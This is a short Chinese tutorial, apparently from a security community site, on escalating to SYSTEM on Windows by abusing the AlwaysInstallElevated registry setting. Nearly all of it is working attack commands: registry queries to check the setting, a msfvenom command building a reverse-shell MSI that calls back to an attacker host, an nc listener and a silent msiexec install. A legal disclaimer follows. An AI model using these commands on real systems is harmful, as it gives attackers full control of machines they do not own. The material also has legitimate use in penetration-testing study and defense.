AlwaysInstallElevated是注册表的一个键值,当其值为1时候,普通用户可以system权限安装MSI文件
实操
攻击机生成shell开启http访问,利用curl在目标机下载
攻击机开启监听并完成反弹
关于alwaysinstallelevated在注册表的位置如下只有值为1才代表具有系统权限:
reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
这里可以用reg query对alwaysinstallelevated在注册表的值查询了下都为1
满足基本条件以后我们可以用msfvenom制作个.msi 恶意软件
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.88.2 LPORT=6666 -f msi -o reverse.msi
新开一个nc监听,用刚才传文件的方法传过去,或者是MSF直接用upload命令传文件过去。传完以后使用msiexec 命令执行
msiexec /quiet /qn /i C:\Users\user\Desktop\reverse.msi
然后就会获得一个更高权限的shell
免责声明:
H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
